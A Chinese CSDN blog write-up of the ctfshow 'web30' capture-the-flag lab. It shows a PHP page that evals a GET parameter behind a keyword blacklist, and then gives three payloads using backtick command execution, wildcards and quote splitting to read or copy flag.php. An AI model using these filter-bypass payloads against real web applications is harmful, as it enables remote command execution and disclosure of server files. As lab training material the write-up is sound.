ctfshow-web入门-命令执行-web30

本文介绍了CTF中web30级别的挑战,重点在于如何通过各种命令执行技巧绕过过滤限制。包括使用`tac`、`nl`、`cp`等命令读取或复制文件,嵌套`eval`、`include`、`require`进行参数逃逸和文件包含,以及利用伪协议和base64解码获取敏感文件`flag.php`的内容。
摘要由CSDN通过智能技术生成

 web30

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

 过滤了flag,system,php

flag和php可以使用通配符?或*绕过

system()函数被禁用可以使用别的函数来命令执行

姿势一?c=echo `tac fla?.*`;

姿势二?c=echo `nl fl''ag.p''hp`;查看源代码

 

  姿势三 ?c=`cp fla?.* 1.txt`;

 利用反引号命令执行将flag.php复制成1.txt然后访问

<

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值